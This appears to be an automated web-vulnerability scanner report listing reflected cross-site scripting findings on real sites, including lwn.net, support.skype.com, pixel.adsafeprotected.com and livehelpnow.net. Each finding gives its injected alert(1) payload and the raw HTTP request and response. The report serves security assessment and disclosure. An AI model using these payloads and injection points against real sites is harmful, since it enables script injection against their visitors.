HTTP/1.1 404 Not Found Date: Mon, 05 Sep 2011 01:55:53 GMT Server: Apache Expires: -1 Content-Length: 4338 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title>404 - Not Found [LWN.net]</title> <meta HTTP- ...[SNIP]... <a href="/articles7bb31"><script>alert(1)</script>b977975e439/456878/%22onmouseover=prompt(%22E-mail%22)%3E?format=printable" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c8fd"><script>alert(1)</script>35c56d0c976 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Mon, 05 Sep 2011 01:55:56 GMT Server: Apache Expires: -1 Content-Length: 4338 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title>404 - Not Found [LWN.net]</title> <meta HTTP- ...[SNIP]... <a href="/articles/4568781c8fd"><script>alert(1)</script>35c56d0c976/%22onmouseover=prompt(%22E-mail%22)%3E?format=printable" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8cab"><script>alert(1)</script>8b9a2d74c08 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Mon, 05 Sep 2011 01:55:58 GMT Server: Apache Expires: -1 Content-Length: 4338 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title>404 - Not Found [LWN.net]</title> <meta HTTP- ...[SNIP]... <a href="/articles/456878/%22onmouseoverd8cab"><script>alert(1)</script>8b9a2d74c08=prompt(%22E-mail%22)%3E?format=printable" rel="nofollow"> ...[SNIP]...
The value of the format request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ec0c"><script>alert(1)</script>2fce89b00d5 was submitted in the format parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Mon, 05 Sep 2011 01:56:03 GMT Server: Apache Expires: -1 Content-Length: 4355 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title>404 - Not Found [LWN.net]</title> <meta HTTP- ...[SNIP]... <a href="/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E?format=printable2ec0c"><script>alert(1)</script>2fce89b00d5?format=printable" rel="nofollow"> ...[SNIP]...
3.104. http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81aab"><script>alert(1)</script>691fb0a816a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Mon, 05 Sep 2011 01:55:51 GMT Server: Apache Expires: -1 Content-Length: 4341 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title>404 - Not Found [LWN.net]</title> <meta HTTP- ...[SNIP]... <a href="/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E?81aab"><script>alert(1)</script>691fb0a816a=1?format=printable" rel="nofollow"> ...[SNIP]...
The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5a70"-alert(1)-"ac321b82b88 was submitted in the anId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144f5a70"-alert(1)-"ac321b82b88&pubId=19240&campId=161441 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=E81A015BB8B9EE5C806AFF54FF4EB670; Path=/ Content-Type: text/javascript Date: Mon, 05 Sep 2011 02:30:54 GMT Connection: close
The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99de3"-alert(1)-"c090c6b65a8 was submitted in the campId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=19240&campId=16144199de3"-alert(1)-"c090c6b65a8 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=B1AACC4AF8BC204CA4CB77100B164407; Path=/ Content-Type: text/javascript Date: Mon, 05 Sep 2011 02:30:55 GMT Connection: close
3.107. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pixel.adsafeprotected.com
Path:
/jspix
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6942"-alert(1)-"91db8ff3473 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=19240&campId=161441&b6942"-alert(1)-"91db8ff3473=1 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=E1323870265AF82DEF33FC529D00C2E5; Path=/ Content-Type: text/javascript Date: Mon, 05 Sep 2011 02:30:55 GMT Connection: close
The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f03b4"-alert(1)-"37599c03060 was submitted in the pubId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=19240f03b4"-alert(1)-"37599c03060&campId=161441 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=29645411B817F05049B7EF8C6DEFE954; Path=/ Content-Type: text/javascript Date: Mon, 05 Sep 2011 02:30:54 GMT Connection: close
3.109. https://support.skype.com/en-us/glossary [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://support.skype.com
Path:
/en-us/glossary
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bffb0"><script>alert(1)</script>b13866784b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/glossary?bffb0"><script>alert(1)</script>b13866784b5=1 HTTP/1.1 Host: support.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:36:52 GMT Content-Type: text/html;charset=utf-8 Content-Language: en-US Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 68011
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.110. https://support.skype.com/en-us/search.form [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://support.skype.com
Path:
/en-us/search.form
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e1fe"><script>alert(1)</script>0e4d33b11c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/search.form?5e1fe"><script>alert(1)</script>0e4d33b11c6=1 HTTP/1.1 Host: support.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.111. https://support.skype.com/en-us/search_first/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://support.skype.com
Path:
/en-us/search_first/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eda5"><script>alert(1)</script>523a4c9c01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/search_first/?2eda5"><script>alert(1)</script>523a4c9c01=1 HTTP/1.1 Host: support.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:36:50 GMT Content-Type: text/html;charset=utf-8 Content-Language: en-US Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 43136
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.112. https://support.skype.com/en/faqFeedback.form [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://support.skype.com
Path:
/en/faqFeedback.form
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dd92"><script>alert(1)</script>b2c781f336 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/faqFeedback.form?1dd92"><script>alert(1)</script>b2c781f336=1 HTTP/1.1 Host: support.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Internal Server Error Date: Sun, 04 Sep 2011 21:33:03 GMT Content-Type: text/html;charset=utf-8 Content-Language: en Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 42398
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.113. https://support.skype.com/en/glossary [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://support.skype.com
Path:
/en/glossary
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc416"><script>alert(1)</script>d582ea7c7f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/glossary?bc416"><script>alert(1)</script>d582ea7c7f7=1 HTTP/1.1 Host: support.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:33:32 GMT Content-Type: text/html;charset=utf-8 Content-Language: en Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 67106
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.114. https://support.skype.com/en/search [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://support.skype.com
Path:
/en/search
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5e9a"><script>alert(1)</script>ccb5065965f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eacf1"><script>alert(1)</script>f803bab4b3d was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lan ...[SNIP]... <input type="hidden" name="context" value="/search.do?q=xsseacf1"><script>alert(1)</script>f803bab4b3d"/> ...[SNIP]...
3.116. https://support.skype.com/en/search.form [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://support.skype.com
Path:
/en/search.form
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fb68"><script>alert(1)</script>87e00cca4aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/search.form?7fb68"><script>alert(1)</script>87e00cca4aa=1 HTTP/1.1 Host: support.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Internal Server Error Date: Sun, 04 Sep 2011 21:33:06 GMT Content-Type: text/html;charset=utf-8 Content-Language: en Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 42394
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.117. https://support.skype.com/en/support_selection_after_search [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://support.skype.com
Path:
/en/support_selection_after_search
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33d66"><script>alert(1)</script>825d2dc978e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/support_selection_after_search?33d66"><script>alert(1)</script>825d2dc978e=1 HTTP/1.1 Host: support.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Internal Server Error Date: Sun, 04 Sep 2011 21:33:04 GMT Content-Type: text/html;charset=utf-8 Content-Language: en Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 42410
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.118. https://support.skype.com/en/tips [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://support.skype.com
Path:
/en/tips
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8243"><script>alert(1)</script>1574cf5533 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/tips?b8243"><script>alert(1)</script>1574cf5533=1 HTTP/1.1 Host: support.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:33:16 GMT Content-Type: text/html;charset=utf-8 Content-Language: en Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 44071
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the a request parameter is copied into the HTML document as plain text between tags. The payload b9dd3<script>alert(1)</script>d4467b383d0 was submitted in the a parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the n request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e697"%3balert(1)//74392895200 was submitted in the n parameter. This input was echoed as 6e697";alert(1)//74392895200 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var s ...[SNIP]... Time String', e); return "00:00:00"; } }
try{ // Settings: Change these values on a per user basis var lwp_ad_username = "w3schools"; var lwp_ad_zoneid = ljt_getZoneID(); var lwp_ad_numads = "16e697";alert(1)//74392895200"; var lwp_ad_premium = "1";// or 0 for non-premium ad var lwp_ad_eleid = "lijit_region_128348"; var lwp_method = "regex"; var lwp_referring_search = getReferringSearch(document.referrer);
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 3ba89<img%20src%3da%20onerror%3dalert(1)>a71b4125463 was submitted in the url parameter. This input was echoed as 3ba89<img src=a onerror=alert(1)>a71b4125463 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the lhnid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ba0fc%3balert(1)//dee046ad40a was submitted in the lhnid parameter. This input was echoed as ba0fc;alert(1)//dee046ad40a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=1288ba0fc%3balert(1)//dee046ad40a&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the lhnid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c53a"%3balert(1)//9f46c8341f8 was submitted in the lhnid parameter. This input was echoed as 2c53a";alert(1)//9f46c8341f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=12882c53a"%3balert(1)//9f46c8341f8&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var lhnTrack='f'; var blhnInstalled=0; if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;} var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnl ...[SNIP]... <img style='position:absolute;top:-5000px;left:-5000px;' width='1' height='1' src='https://www.livehelpnow.net/lhn/jsutil/showninvitationmessage.aspx?iplhnid=50.23.123.106|12882c53a";alert(1)//9f46c8341f8|9/4/2011 12:18:23 PM' /> ...[SNIP]...
The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66e04'%3balert(1)//c592964d139 was submitted in the t parameter. This input was echoed as 66e04';alert(1)//c592964d139 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=1288&iv=&custom1=&custom2=&custom3=&t=f66e04'%3balert(1)//c592964d139 HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var lhnTrack='f66e04';alert(1)//c592964d139'; var blhnInstalled=0; if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;} var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnline=0; InviteRepe ...[SNIP]...
The value of the zimg request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 55a0d%3balert(1)//87929036ab1 was submitted in the zimg parameter. This input was echoed as 55a0d;alert(1)//87929036ab1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=5955a0d%3balert(1)//87929036ab1&lhnid=1288&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the code request parameter is copied into the HTML document as plain text between tags. The payload 1bb34<script>alert(1)</script>4e27ce41b52 was submitted in the code parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the code request parameter is copied into the HTML document as plain text between tags. The payload 303c8<script>alert(1)</script>a71ebc654b was submitted in the code parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload d2551<script>alert(1)</script>1979d1643d9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
